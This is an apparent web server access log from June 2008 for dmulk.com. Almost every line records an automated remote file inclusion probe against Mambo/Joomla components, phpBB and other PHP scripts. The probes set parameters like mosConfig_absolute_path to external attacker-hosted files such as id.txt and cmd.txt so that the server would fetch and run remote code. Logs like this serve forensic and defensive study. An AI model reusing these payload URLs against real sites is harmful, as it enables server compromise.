81.169.154.69 - - [09/Jun/2008:10:31:22 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.154.69 - - [09/Jun/2008:10:31:23 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:31:23 -0700] "GET /logs/access_080325.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.154.69 - - [09/Jun/2008:10:31:24 -0700] "GET /logs/access_080129.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:10:31:59 -0700] "GET /logs/access_080208.log//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:10:32:00 -0700] "GET //administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:10:32:00 -0700] "GET /logs//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [09/Jun/2008:10:32:20 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [09/Jun/2008:10:32:21 -0700] "GET //errors.php?error=http://www.geocities.com/vianarina/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
72.47.201.117 - - [09/Jun/2008:10:32:21 -0700] "GET /logs//errors.php?error=http://www.geocities.com/vianarina/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
217.75.193.70 - - [09/Jun/2008:10:32:30 -0700] "GET /logs/access_080124.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.75.110 - - [09/Jun/2008:10:32:46 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/style.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
91.121.75.110 - - [09/Jun/2008:10:32:46 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/style.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
62.212.90.214 - - [09/Jun/2008:10:33:06 -0700] "GET /logs/access_080129.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.94.122 - - [09/Jun/2008:10:33:08 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.144.143.180 - - [09/Jun/2008:10:33:36 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://agenciafederaldebotes.com/~prueba/includes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.144.143.180 - - [09/Jun/2008:10:33:37 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://agenciafederaldebotes.com/~prueba/includes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.144.143.180 - - [09/Jun/2008:10:33:37 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://agenciafederaldebotes.com/~prueba/includes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.154.69 - - [09/Jun/2008:10:33:45 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
209.51.132.170 - - [09/Jun/2008:10:33:52 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [09/Jun/2008:10:33:54 -0700] "GET /classes/core/language.php?rootdir=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.254.184.51 - - [09/Jun/2008:10:34:03 -0700] "GET /logs/index2.php?x=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
193.254.184.51 - - [09/Jun/2008:10:34:04 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
193.254.184.51 - - [09/Jun/2008:10:34:04 -0700] "GET /index2.php?x=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
193.254.184.51 - - [09/Jun/2008:10:34:04 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
70.84.182.98 - - [09/Jun/2008:10:34:05 -0700] "GET /classes/core/language.php?rootdir=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.7.108.203 - - [09/Jun/2008:10:34:29 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.7.108.203 - - [09/Jun/2008:10:34:30 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.swdgems.com/readme.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:10:34:38 -0700] "GET /logs/access_080219.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.42.183.2 - - [09/Jun/2008:10:34:55 -0700] "GET /logs/access_080103.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.42.183.2 - - [09/Jun/2008:10:34:55 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.42.183.2 - - [09/Jun/2008:10:34:55 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.42.183.2 - - [09/Jun/2008:10:35:10 -0700] "GET /logs/access_080129.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:10:35:18 -0700] "GET /logs/access_080418.log/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.154.69 - - [09/Jun/2008:10:35:42 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.154.69 - - [09/Jun/2008:10:35:42 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
87.119.200.212 - - [09/Jun/2008:10:35:51 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.212 - - [09/Jun/2008:10:35:52 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.axelfoto.com/sr/editor_uploads/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.128.131.80 - - [09/Jun/2008:10:36:09 -0700] "GET /logs/index.php?redir=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [09/Jun/2008:10:36:14 -0700] "GET /index.php?redir=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 200 16841 "-" "libwww-perl/5.803" "www.dmulk.com"
80.154.38.121 - - [09/Jun/2008:10:36:15 -0700] "GET //administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.243.21 - - [09/Jun/2008:10:36:15 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
124.217.243.21 - - [09/Jun/2008:10:36:15 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
168.209.97.34 - - [09/Jun/2008:10:36:42 -0700] "GET //errors.php?error=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
210.240.31.1 - - [09/Jun/2008:10:37:08 -0700] "GET /logs/access_080201.log/index.php?pagina=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.31.1 - - [09/Jun/2008:10:37:11 -0700] "GET /index.php?pagina=http://www.venezia2.it/coges.txt?? HTTP/1.1" 200 16819 "-" "libwww-perl/5.805" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:37:11 -0700] "GET /logs/access_080429.log/mambotscontent/amazonpartner.php?mosConfig_absolute_path=http://wellingtonindustries.com/tanii?????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.240.31.1 - - [09/Jun/2008:10:37:11 -0700] "GET /logs/index.php?pagina=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.90.214 - - [09/Jun/2008:10:37:27 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.90.214 - - [09/Jun/2008:10:37:27 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.82.172 - - [09/Jun/2008:10:37:39 -0700] "GET /logs/index.php?p=http://www.amordebicho.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
82.194.82.172 - - [09/Jun/2008:10:37:39 -0700] "GET /index.php?p=http://www.amordebicho.com/test.txt??? HTTP/1.1" 200 16821 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
211.224.129.124 - - [09/Jun/2008:10:37:47 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.51.132.170 - - [09/Jun/2008:10:38:12 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.51.132.170 - - [09/Jun/2008:10:38:13 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.240.31.1 - - [09/Jun/2008:10:38:25 -0700] "GET /logs/access.log/index.php?pagina=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:38:28 -0700] "GET /logs/access_080103.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.poko.sitesled.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:38:28 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.poko.sitesled.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:38:31 -0700] "GET /logs/access_080103.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.poko.sitesled.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:38:31 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.poko.sitesled.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:38:31 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.poko.sitesled.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:38:32 -0700] "GET /logs/access_080129.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.poko.sitesled.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:38:34 -0700] "GET /logs/access_080129.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.poko.sitesled.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:38:47 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.poko.sitesled.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.44.241.42 - - [09/Jun/2008:10:38:58 -0700] "GET / HTTP/1.1" 200 16685 "http://forums.off-road.com/jeep-short-wheelbase/162537-amc-jeep-cj10a-aircraft-tug-have-questions.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.19.216.122 - - [09/Jun/2008:10:39:26 -0700] "GET /logs/access_080215.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.216.122 - - [09/Jun/2008:10:39:28 -0700] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 200 17073 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.216.122 - - [09/Jun/2008:10:39:28 -0700] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:10:39:32 -0700] "GET /logs/access_080215.log//authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:10:39:32 -0700] "GET //authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:10:39:32 -0700] "GET /logs//authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:40:26 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:40:27 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.211.155 - - [09/Jun/2008:10:40:37 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.193.199 - - [09/Jun/2008:10:40:39 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://it.geocities.com/djr0x32/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.193.199 - - [09/Jun/2008:10:40:40 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://it.geocities.com/djr0x32/bsid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.211.155 - - [09/Jun/2008:10:40:44 -0700] "GET /logs/access_080103.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.211.155 - - [09/Jun/2008:10:40:44 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.211.155 - - [09/Jun/2008:10:40:49 -0700] "GET /logs/access_080129.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.171.66.158 - - [09/Jun/2008:10:41:38 -0700] "GET /logs/order.php?lang=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.158 - - [09/Jun/2008:10:41:38 -0700] "GET /order.php?lang=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.158 - - [09/Jun/2008:10:41:40 -0700] "GET /logs/order.php?lang=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.158 - - [09/Jun/2008:10:41:40 -0700] "GET /order.php?lang=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
192.71.66.145 - - [09/Jun/2008:10:41:50 -0700] "GET /logs/access_080223.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:41:51 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.poko.sitesled.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:41:51 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.poko.sitesled.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:42:08 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.poko.sitesled.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:42:08 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.poko.sitesled.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.27.211.145 - - [09/Jun/2008:10:42:18 -0700] "GET /logs/access_080223.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
200.53.114.42 - - [09/Jun/2008:10:42:22 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.53.114.42 - - [09/Jun/2008:10:42:22 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.53.114.42 - - [09/Jun/2008:10:42:22 -0700] "GET /logs/access_080103.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.53.114.42 - - [09/Jun/2008:10:42:23 -0700] "GET /logs/access_080129.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.poko.sitesled.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.202.242.102 - - [09/Jun/2008:10:42:44 -0700] "GET /logs/access_080312.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.202.242.102 - - [09/Jun/2008:10:42:44 -0700] "GET /logs/access_080312.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.202.242.102 - - [09/Jun/2008:10:42:44 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.202.242.102 - - [09/Jun/2008:10:42:45 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.202.242.102 - - [09/Jun/2008:10:42:45 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.202.242.102 - - [09/Jun/2008:10:42:46 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
66.249.67.79 - - [09/Jun/2008:10:43:57 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0036.jpg HTTP/1.1" 200 10874 "-" "Googlebot-Image/1.0" "dmulk.com"
213.202.242.102 - - [09/Jun/2008:10:44:13 -0700] "GET /logs/access_080201.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.202.242.102 - - [09/Jun/2008:10:44:13 -0700] "GET /logs/access_080201.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
217.172.182.209 - - [09/Jun/2008:10:44:25 -0700] "GET /logs/access_080201.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [09/Jun/2008:10:44:26 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [09/Jun/2008:10:44:26 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [09/Jun/2008:10:45:03 -0700] "GET /logs/access_080312.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.43.83.143 - - [09/Jun/2008:10:45:20 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dom.dream-irc.loc/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.43.83.143 - - [09/Jun/2008:10:45:20 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dom.dream-irc.loc/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
